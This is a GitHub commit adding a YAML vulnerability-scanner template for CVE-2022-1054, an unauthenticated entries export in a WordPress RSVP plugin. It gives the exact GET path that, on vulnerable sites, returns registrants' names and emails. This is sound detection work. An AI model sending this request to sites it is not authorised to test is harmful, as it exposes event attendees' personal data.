Create CVE-2022-1054.yaml

patch-1
Prince Chaddha 2022-04-21 02:51:08 +04:00 committed by GitHub
parent a15b04eb04
commit b0f264c0b8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2022-1054
info:
name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export
author: Akincibor
severity: medium
description: The plugin does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of users registered for events.
reference:
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
tags: wp,wp-plugin,wordpress,cve,cve2022
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'RSVP Status'
- type: status
status:
- 200